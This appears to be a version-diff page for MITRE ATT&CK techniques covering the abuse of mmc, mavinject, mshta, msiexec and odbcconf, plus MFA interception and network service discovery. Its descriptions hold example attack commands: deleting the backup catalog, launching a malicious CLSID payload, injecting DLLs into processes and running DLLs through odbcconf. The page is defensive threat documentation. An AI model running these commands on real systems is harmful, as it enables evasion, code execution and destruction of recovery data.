> malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc > linked to the malicious CLSID subkey.(Citation: mmc_vulns) 
>file is saved, adversaries may invoke the malicious CLSID pa>Once the .msc file is saved, adversaries may invoke the mali
>yload with the following command: <code>mmc.exe -Embedding C>cious CLSID payload with the following command: <code>mmc.ex
>:\path\to\test.msc</code>.(Citation: abusing_com_reg)>e -Embedding C:\path\to\test.msc</code>.(Citation: abusing_c
 >om_reg)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 00:13:18.889000+00:002022-05-20 17:41:16.112000+00:00
descriptionAdversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview) For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal) Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg)Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview) For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal) Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg)
external_references[1]['source_name']win_mmcabusing_com_reg
external_references[1]['description']Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.
external_references[1]['url']https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmchttps://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
external_references[2]['source_name']what_is_mmcmmc_vulns
external_references[2]['description']Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.
external_references[2]['url']https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-consolehttps://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/
external_references[4]['source_name']win_wbadmin_delete_catalogwin_mmc
external_references[4]['description']Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.
external_references[4]['url']https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-cataloghttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc
external_references[5]['source_name']phobos_virustotalwin_wbadmin_delete_catalog
external_references[5]['description']Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.
external_references[5]['url']https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog
external_references[7]['source_name']mmc_vulnswhat_is_mmc
external_references[7]['description']Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.
external_references[7]['url']https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console
external_references[8]['source_name']abusing_com_regphobos_virustotal
external_references[8]['description']bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.
external_references[8]['url']https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.02.0

[T1218.013] System Binary Proxy Execution: Mavinject

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may abuse mavinject.exe to proxy execution of mat1Adversaries may abuse mavinject.exe to proxy execution of ma
>licious code. Mavinject.exe is the Microsoft Application Vir>licious code. Mavinject.exe is the Microsoft Application Vir
>tualization Injector, a Windows utility that can inject code>tualization Injector, a Windows utility that can inject code
> into external processes as part of Microsoft Application Vi> into external processes as part of Microsoft Application Vi
>rtualization (App-V).(Citation: LOLBAS Mavinject)  Adversari>rtualization (App-V).(Citation: LOLBAS Mavinject)  Adversari
>es may abuse mavinject.exe to inject malicious DLLs into run>es may abuse mavinject.exe to inject malicious DLLs into run
>ning processes (i.e. [Dynamic-link Library Injection](https:>ning processes (i.e. [Dynamic-link Library Injection](https:
>//attack.mitre.org/techniques/T1055/001)), allowing for arbi>//attack.mitre.org/techniques/T1055/001)), allowing for arbi
>trary code execution (ex. <code>C:\Windows\system32\mavinjec>trary code execution (ex. <code>C:\Windows\system32\mavinjec
>t.exe PID /INJECTRUNNING PATH_DLL</code>).(Citation: ATT Laz>t.exe PID /INJECTRUNNING PATH_DLL</code>).(Citation: ATT Laz
>arus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinj>arus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinj
>ect.exe is digitally signed by Microsoft, proxying execution>ect.exe may be digitally signed by Microsoft, proxying execu
> via this method may evade detection by security products be>tion via this method may evade detection by security product
>cause the execution is masked under a legitimate process.   >s because the execution is masked under a legitimate process
>In addition to [Dynamic-link Library Injection](https://atta>.   In addition to [Dynamic-link Library Injection](https://
>ck.mitre.org/techniques/T1055/001), Mavinject.exe can also b>attack.mitre.org/techniques/T1055/001), Mavinject.exe can al
>e abused to perform import descriptor injection via its  <co>so be abused to perform import descriptor injection via its 
>de>/HMODULE</code> command-line parameter (ex. <code>mavinje> <code>/HMODULE</code> command-line parameter (ex. <code>mav
>ct.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</co>inject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER
>de>). This command would inject an import table entry consis></code>). This command would inject an import table entry co
>ting of the specified DLL into the module at the given base >nsisting of the specified DLL into the module at the given b
>address.(Citation: Mavinject Functionality Deconstructed)>ase address.(Citation: Mavinject Functionality Deconstructed
 >)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 22:11:03.446000+00:002022-04-19 17:35:08.315000+00:00
descriptionAdversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject) Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject) Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)
external_references[1]['source_name']LOLBAS MavinjectATT Lazarus TTP Evolution
external_references[1]['description']LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.
external_references[1]['url']https://lolbas-project.github.io/lolbas/Binaries/Mavinject/https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution
external_references[2]['source_name']ATT Lazarus TTP EvolutionLOLBAS Mavinject
external_references[2]['description']Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.
external_references[2]['url']https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolutionhttps://lolbas-project.github.io/lolbas/Binaries/Mavinject/
external_references[3]['source_name']Reaqta MavinjectMavinject Functionality Deconstructed
external_references[3]['description']Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.
external_references[3]['url']https://reaqta.com/2017/12/mavinject-microsoft-injector/https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
external_references[4]['source_name']Mavinject Functionality DeconstructedReaqta Mavinject
external_references[4]['description']Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.
external_references[4]['url']https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0ehttps://reaqta.com/2017/12/mavinject-microsoft-injector/
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.02.0

[T1218.005] System Binary Proxy Execution: Mshta

Current version: 2.0

Version changed from: 1.1 → 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 23:59:00.395000+00:002022-03-11 20:38:28.802000+00:00
external_references[1]['description']Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
external_references[1]['url']https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdfhttps://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf
x_mitre_data_sources[0]Process: Process CreationNetwork Traffic: Network Connection Creation
x_mitre_data_sources[1]File: File CreationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[3]Network Traffic: Network Connection CreationFile: File Creation
x_mitre_version1.12.0

[T1218.007] System Binary Proxy Execution: Msiexec

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may abuse msiexec.exe to proxy execution of malit1Adversaries may abuse msiexec.exe to proxy execution of mali
>cious payloads. Msiexec.exe is the command-line utility for >cious payloads. Msiexec.exe is the command-line utility for 
>the Windows Installer and is thus commonly associated with e>the Windows Installer and is thus commonly associated with e
>xecuting installation packages (.msi).(Citation: Microsoft m>xecuting installation packages (.msi).(Citation: Microsoft m
>siexec) Msiexec.exe is digitally signed by Microsoft.  Adver>siexec) The Msiexec.exe binary may also be digitally signed 
>saries may abuse msiexec.exe to launch local or network acce>by Microsoft.  Adversaries may abuse msiexec.exe to launch l
>ssible MSI files. Msiexec.exe can also execute DLLs.(Citatio>ocal or network accessible MSI files. Msiexec.exe can also e
>n: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Si>xecute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro 
>nce it is signed and native on Windows systems, msiexec.exe >Msiexec Feb 2018) Since it may be signed and native on Windo
>can be used to bypass application control solutions that do >ws systems, msiexec.exe can be used to bypass application co
>not account for its potential abuse. Msiexec.exe execution m>ntrol solutions that do not account for its potential abuse.
>ay also be elevated to SYSTEM privileges if the <code>Always> Msiexec.exe execution may also be elevated to SYSTEM privil
>InstallElevated</code> policy is enabled.(Citation: Microsof>eges if the <code>AlwaysInstallElevated</code> policy is ena
>t AlwaysInstallElevated 2018)>bled.(Citation: Microsoft AlwaysInstallElevated 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-06-07 19:57:26.824000+00:002022-04-19 17:33:16.346000+00:00
descriptionAdversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
external_references[1]['source_name']Microsoft msiexecTrendMicro Msiexec Feb 2018
external_references[1]['description']Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.
external_references[1]['url']https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexechttps://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
external_references[3]['source_name']TrendMicro Msiexec Feb 2018Microsoft msiexec
external_references[3]['description']Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.
external_references[3]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
x_mitre_data_sources[0]Process: Process CreationNetwork Traffic: Network Connection Creation
x_mitre_data_sources[1]Module: Module LoadCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionModule: Module Load
x_mitre_data_sources[3]Network Traffic: Network Connection CreationProcess: Process Creation
x_mitre_version1.12.0

[T1111] Multi-Factor Authentication Interception

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may target two-factor authentication mechanisms,t1Adversaries may target multi-factor authentication (MFA) mec
> such as smart cards, to gain access to credentials that can>hanisms, (I.e., smart cards, token generators, etc.) to gain
> be used to access systems, services, and network resources.> access to credentials that can be used to access systems, s
> Use of two or multi-factor authentication (2FA or MFA) is r>ervices, and network resources. Use of MFA is recommended an
>ecommended and provides a higher level of security than user>d provides a higher level of security than user names and pa
> names and passwords alone, but organizations should be awar>sswords alone, but organizations should be aware of techniqu
>e of techniques that could be used to intercept and bypass t>es that could be used to intercept and bypass these security
>hese security mechanisms.   If a smart card is used for two-> mechanisms.   If a smart card is used for multi-factor auth
>factor authentication, then a keylogger will need to be used>entication, then a keylogger will need to be used to obtain 
> to obtain the password associated with a smart card during >the password associated with a smart card during normal use.
>normal use. With both an inserted card and access to the sma> With both an inserted card and access to the smart card pas
>rt card password, an adversary can connect to a network reso>sword, an adversary can connect to a network resource using 
>urce using the infected system to proxy the authentication w>the infected system to proxy the authentication with the ins
>ith the inserted hardware token. (Citation: Mandiant M Trend>erted hardware token. (Citation: Mandiant M Trends 2011)  Ad
>s 2011)  Adversaries may also employ a keylogger to similarl>versaries may also employ a keylogger to similarly target ot
>y target other hardware tokens, such as RSA SecurID. Capturi>her hardware tokens, such as RSA SecurID. Capturing token in
>ng token input (including a user's personal identification c>put (including a user's personal identification code) may pr
>ode) may provide temporary access (i.e. replay the one-time >ovide temporary access (i.e. replay the one-time passcode un
>passcode until the next value rollover) as well as possibly >til the next value rollover) as well as possibly enabling ad
>enabling adversaries to reliably predict future authenticati>versaries to reliably predict future authentication values (
>on values (given access to both the algorithm and any seed v>given access to both the algorithm and any seed values used 
>alues used to generate appended temporary codes). (Citation:>to generate appended temporary codes). (Citation: GCN RSA Ju
> GCN RSA June 2011)  Other methods of 2FA may be intercepted>ne 2011)  Other methods of MFA may be intercepted and used b
> and used by an adversary to authenticate. It is common for >y an adversary to authenticate. It is common for one-time co
>one-time codes to be sent via out-of-band communications (em>des to be sent via out-of-band communications (email, SMS). 
>ail, SMS). If the device and/or service is not secured, then>If the device and/or service is not secured, then it may be 
> it may be vulnerable to interception. Although primarily fo>vulnerable to interception. Although primarily focused on by
>cused on by cyber criminals, these authentication mechanisms> cyber criminals, these authentication mechanisms have been 
> have been targeted by advanced actors. (Citation: Operation>targeted by advanced actors. (Citation: Operation Emmental)
> Emmental) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 20:35:21.672000+00:002022-04-01 18:02:50.531000+00:00
nameTwo-Factor Authentication InterceptionMulti-Factor Authentication Interception
descriptionAdversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)
x_mitre_version1.12.0

[T1046] Network Service Discovery

Current version: 3.0

Version changed from: 2.2 → 3.0


Old Description
New Description
t1Adversaries may attempt to get a listing of services runningt1Adversaries may attempt to get a listing of services running
> on remote hosts, including those that may be vulnerable to > on remote hosts and local network infrastructure devices, i
>remote software exploitation. Methods to acquire this inform>ncluding those that may be vulnerable to remote software exp
>ation include port scans and vulnerability scans using tools>loitation. Common methods to acquire this information includ
> that are brought onto a system.   Within cloud environments>e port and/or vulnerability scans using tools that are broug
>, adversaries may attempt to discover services running on ot>ht onto a system.(Citation: CISA AR21-126A FIVEHANDS May 202
>her cloud hosts. Additionally, if the cloud environment is c>1)     Within cloud environments, adversaries may attempt to
>onnected to a on-premises environment, adversaries may be ab> discover services running on other cloud hosts. Additionall
>le to identify services running on non-cloud systems as well>y, if the cloud environment is connected to a on-premises en
>.>vironment, adversaries may be able to identify services runn
 >ing on non-cloud systems as well.  Within macOS environments
 >, adversaries may use the native Bonjour application to disc
 >over services running on other macOS hosts within a network.
 > The Bonjour mDNSResponder daemon automatically registers an
 >d advertises a host’s registered services on the network. Fo
 >r example, adversaries can use a mDNS query (such as <code>d
 >ns-sd -B _ssh._tcp .</code>) to find other systems broadcast
 >ing the ssh service.(Citation: apple doco bonjour descriptio
 >n)(Citation: macOS APT Activity Bradley)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesApple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM', 'User']
external_referencesCAPEC-300
values_changed
STIX FieldOld valueNew Value
modified2021-04-09 14:56:26.562000+00:002022-04-20 16:05:30.960000+00:00
nameNetwork Service ScanningNetwork Service Discovery
descriptionAdversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021) Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well. Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
external_references[1]['source_name']capecapple doco bonjour description
external_references[1]['url']https://capec.mitre.org/data/definitions/300.htmlhttps://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html
x_mitre_data_sources[1]Cloud Service: Cloud Service EnumerationNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[2]Network Traffic: Network Traffic FlowCloud Service: Cloud Service Enumeration
x_mitre_version2.23.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'CISA AR21-126A FIVEHANDS May 2021', 'description': 'CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.', 'url': 'https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a'}
external_references{'source_name': 'macOS APT Activity Bradley', 'description': 'Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.', 'url': 'https://themittenmac.com/what-does-apt-activity-look-like-on-macos/'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/300.html', 'external_id': 'CAPEC-300'}
x_mitre_platformsNetwork

[T1218.008] System Binary Proxy Execution: Odbcconf

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may abuse odbcconf.exe to proxy execution of malt1Adversaries may abuse odbcconf.exe to proxy execution of mal
>icious payloads. Odbcconf.exe is a Windows utility that allo>icious payloads. Odbcconf.exe is a Windows utility that allo
>ws you to configure Open Database Connectivity (ODBC) driver>ws you to configure Open Database Connectivity (ODBC) driver
>s and data source names.(Citation: Microsoft odbcconf.exe) O>s and data source names.(Citation: Microsoft odbcconf.exe) T
>dbcconf.exe is digitally signed by Microsoft.  Adversaries m>he Odbcconf.exe binary may be digitally signed by Microsoft.
>ay abuse odbcconf.exe to bypass application control solution>  Adversaries may abuse odbcconf.exe to bypass application c
>s that do not account for its potential abuse. Similar to [R>ontrol solutions that do not account for its potential abuse
>egsvr32](https://attack.mitre.org/techniques/T1218/010), odb>. Similar to [Regsvr32](https://attack.mitre.org/techniques/
>cconf.exe has a <code>REGSVR</code> flag that can be misused>T1218/010), odbcconf.exe has a <code>REGSVR</code> flag that
> to execute DLLs (ex: <code>odbcconf.exe /S /A &lbrace;REGSV> can be misused to execute DLLs (ex: <code>odbcconf.exe /S /
>R "C:\Users\Public\file.dll"&rbrace;</code>). (Citation: LOL>A &lbrace;REGSVR "C:\Users\Public\file.dll"&rbrace;</code>).
>BAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Cita> (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo
>tion: TrendMicro Cobalt Group Nov 2017)  > Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)  
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
